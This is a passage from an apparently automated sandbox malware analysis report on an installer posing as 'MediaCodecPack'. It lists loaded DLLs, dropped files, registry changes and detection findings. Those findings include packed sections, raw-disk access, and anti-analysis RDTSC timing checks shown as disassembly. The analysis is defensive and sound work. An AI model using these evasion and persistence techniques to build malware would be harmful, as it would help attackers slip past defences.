                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpSection loaded: shfolder.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpSection loaded: msacm32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpSection loaded: riched20.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpSection loaded: usp10.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpSection loaded: msls31.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpSection loaded: sfc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: sqlite3.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpWindow found: window name: TMainFormJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MediaCodecPack_is1Jump to behavior
                    Source: Hbq580QZAR.exeStatic file information: File size 3445716 > 1048576
                    Source: Binary string: msvcp71.pdbx# source: is-FG1GT.tmp.1.dr
                    Source: Binary string: msvcr71.pdb< source: is-38DHO.tmp.1.dr
                    Source: Binary string: msvcp71.pdb source: is-FG1GT.tmp.1.dr
                    Source: Binary string: MicrosoftWindowsGdiPlus-1.0.2600.1360-gdiplus.pdb source: is-L8DJ5.tmp.1.dr
                    Source: Binary string: msvcr71.pdb source: is-38DHO.tmp.1.dr

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeUnpacked PE file: 3.2.mediacodecpack.exe.400000.0.unpack .aitt4:ER;.ajtt4:R;.aktt4:W;.rsrc:R;.altt4:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeUnpacked PE file: 3.2.mediacodecpack.exe.400000.0.unpack
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_004502C0 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004502C0
                    Source: initial sampleStatic PE information: section where entry point is pointing to: .aitt4
                    Source: mediacodecpack.exe.1.drStatic PE information: section name: .aitt4
                    Source: mediacodecpack.exe.1.drStatic PE information: section name: .ajtt4
                    Source: mediacodecpack.exe.1.drStatic PE information: section name: .aktt4
                    Source: mediacodecpack.exe.1.drStatic PE information: section name: .altt4
                    Source: is-L8DJ5.tmp.1.drStatic PE information: section name: Shared
                    Source: is-FD66D.tmp.1.drStatic PE information: section name: /4
                    Source: is-FD66D.tmp.1.drStatic PE information: section name: /19
                    Source: is-FD66D.tmp.1.drStatic PE information: section name: /35
                    Source: is-FD66D.tmp.1.drStatic PE information: section name: /51
                    Source: is-FD66D.tmp.1.drStatic PE information: section name: /63
                    Source: is-FD66D.tmp.1.drStatic PE information: section name: /77
                    Source: is-FD66D.tmp.1.drStatic PE information: section name: /89
                    Source: is-FD66D.tmp.1.drStatic PE information: section name: /102
                    Source: is-FD66D.tmp.1.drStatic PE information: section name: /113
                    Source: is-FD66D.tmp.1.drStatic PE information: section name: /124
                    Source: MediaCodecPack.exe.3.drStatic PE information: section name: .aitt4
                    Source: MediaCodecPack.exe.3.drStatic PE information: section name: .ajtt4
                    Source: MediaCodecPack.exe.3.drStatic PE information: section name: .aktt4
                    Source: MediaCodecPack.exe.3.drStatic PE information: section name: .altt4
                    Source: sqlite3.dll.3.drStatic PE information: section name: /4
                    Source: sqlite3.dll.3.drStatic PE information: section name: /19
                    Source: sqlite3.dll.3.drStatic PE information: section name: /35
                    Source: sqlite3.dll.3.drStatic PE information: section name: /51
                    Source: sqlite3.dll.3.drStatic PE information: section name: /63
                    Source: sqlite3.dll.3.drStatic PE information: section name: /77
                    Source: sqlite3.dll.3.drStatic PE information: section name: /89
                    Source: sqlite3.dll.3.drStatic PE information: section name: /102
                    Source: sqlite3.dll.3.drStatic PE information: section name: /113
                    Source: sqlite3.dll.3.drStatic PE information: section name: /124
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exeCode function: 0_2_004065C8 push 00406605h; ret 0_2_004065FD
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exeCode function: 0_2_004040B5 push eax; ret 0_2_004040F1
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exeCode function: 0_2_00408104 push ecx; mov dword ptr [esp], eax0_2_00408109
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exeCode function: 0_2_00404185 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exeCode function: 0_2_00404206 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exeCode function: 0_2_0040C218 push eax; ret 0_2_0040C219
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exeCode function: 0_2_004042E8 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exeCode function: 0_2_00404283 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exeCode function: 0_2_00408F38 push 00408F6Bh; ret 0_2_00408F63
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_0040994C push 00409989h; ret 1_2_00409981
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_00483F88 push 00484096h; ret 1_2_0048408E
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_004062B4 push ecx; mov dword ptr [esp], eax1_2_004062B5
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_004104E0 push ecx; mov dword ptr [esp], edx1_2_004104E5
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_00412928 push 0041298Bh; ret 1_2_00412983
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_00494CAC push ecx; mov dword ptr [esp], ecx1_2_00494CB1
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_0040CE38 push ecx; mov dword ptr [esp], edx1_2_0040CE3A
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_004592D0 push 00459314h; ret 1_2_0045930C
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_0040F398 push ecx; mov dword ptr [esp], edx1_2_0040F39A
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_00443440 push ecx; mov dword ptr [esp], ecx1_2_00443444
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_0040546D push eax; ret 1_2_004054A9
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_0040553D push 00405749h; ret 1_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_004055BE push 00405749h; ret 1_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_00485678 push ecx; mov dword ptr [esp], ecx1_2_0048567D
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_0040563B push 00405749h; ret 1_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_004056A0 push 00405749h; ret 1_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_004517F8 push 0045182Bh; ret 1_2_00451823
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_004519BC push ecx; mov dword ptr [esp], eax1_2_004519C1
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_00477B08 push ecx; mov dword ptr [esp], edx1_2_00477B09
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_00419C28 push ecx; mov dword ptr [esp], ecx1_2_00419C2D
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_0045FD1C push ecx; mov dword ptr [esp], ecx1_2_0045FD20
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_00499D30 pushad ; retf 1_2_00499D3F
                    Source: mediacodecpack.exe.1.drStatic PE information: section name: .aitt4 entropy: 7.742728051481311
                    Source: MediaCodecPack.exe.3.drStatic PE information: section name: .aitt4 entropy: 7.742728051481311

                    Persistence and Installation Behavior

                    barindex
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive03_2_02D4E8A7
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-FG1GT.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpFile created: C:\Users\user\AppData\Local\Temp\is-OHUB6.tmp\_isetup\_shfoldr.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exeFile created: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\uninstall\is-TV2PJ.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-L8DJ5.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\uninstall\unins000.exe (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\sqlite3.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\msvcp71.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-38DHO.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\gdiplus.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeFile created: C:\ProgramData\MediaCodecPack\MediaCodecPack.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\msvcr71.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-GC9CG.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpFile created: C:\Users\user\AppData\Local\Temp\is-OHUB6.tmp\_isetup\_iscrypt.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-FD66D.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeFile created: C:\ProgramData\MediaCodecPack\sqlite3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpFile created: C:\Users\user\AppData\Local\Temp\is-OHUB6.tmp\_isetup\_setup64.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeFile created: C:\ProgramData\MediaCodecPack\MediaCodecPack.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeFile created: C:\ProgramData\MediaCodecPack\sqlite3.dllJump to dropped file

                    Boot Survival

                    barindex
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive03_2_02D4E8A7
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_00401951 GetLocalTime,StartServiceCtrlDispatcherA,lstrcmpiW,3_2_00401951
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_00423C0C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423C0C
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_00423C0C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423C0C
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_004241DC IsIconic,SetActiveWindow,SetFocus,1_2_004241DC
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_00424194 IsIconic,SetActiveWindow,1_2_00424194
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_00418384 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,1_2_00418384
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_0042285C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,1_2_0042285C
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_00417598 IsIconic,GetCapture,1_2_00417598
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_0048393C IsIconic,GetWindowLongA,ShowWindow,ShowWindow,1_2_0048393C
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_00417CCE IsIconic,SetWindowPos,1_2_00417CCE
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_00417CD0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,1_2_00417CD0
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_0041F118 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,1_2_0041F118
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeRDTSC instruction interceptor: First address: 40D6C2 second address: 40D6C2 instructions: 0x00000000 rdtsc 0x00000002 sal si, FFF1h 0x00000006 mov eax, dword ptr [ebp-0Ch] 0x00000009 mov edx, dword ptr [ebp-30h] 0x0000000c rcr esi, FFFFFFD5h 0x0000000f movzx esi, bx 0x00000012 add edx, dword ptr [eax+0Ch] 0x00000015 lahf 0x00000016 cwde 0x00000017 mov eax, dword ptr [ebp-18h] 0x0000001a mov si, cx 0x0000001d movsx esi, si 0x00000020 mov esi, dword ptr [ebp-18h] 0x00000023 mov cl, byte ptr [ecx+esi] 0x00000026 jmp 00007F5204BB6A89h 0x0000002b mov byte ptr [edx+eax], cl 0x0000002e jmp 00007F5204BCDC2Ch 0x00000033 mov eax, dword ptr [ebp-18h] 0x00000036 jmp 00007F5204BB577Ch 0x0000003b inc eax 0x0000003c ror cl, 0000007Bh 0x0000003f btc ecx, FFFFFF83h 0x00000043 mov dword ptr [ebp-18h], eax 0x00000046 jmp 00007F5204BCE270h 0x0000004b mov eax, dword ptr [ebp-28h] 0x0000004e cmp ebp, eax 0x00000050 or ch, cl 0x00000052 mov ecx, dword ptr [ebp-18h] 0x00000055 cmp di, 6D14h 0x0000005a cmp ecx, dword ptr [eax+10h] 0x0000005d jnc 00007F5204BB5BA3h 0x00000063 mov eax, dword ptr [ebp-28h] 0x00000066 jmp 00007F5204BC1A54h 0x0000006b mov ecx, dword ptr [ebp-1Ch] 0x0000006e add si, di 0x00000071 add ecx, dword ptr [eax+14h] 0x00000074 rdtsc
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_0040D6B9 rdtsc 3_2_0040D6B9
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,3_2_02D4E9AB
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeWindow / User API: threadDelayed 5465Jump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeWindow / User API: threadDelayed 4461Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-FG1GT.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-OHUB6.tmp\_isetup\_shfoldr.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-L8DJ5.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\uninstall\is-TV2PJ.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\uninstall\unins000.exe (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\msvcp71.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-38DHO.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\gdiplus.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\msvcr71.dll (copy)Jump to dropped file
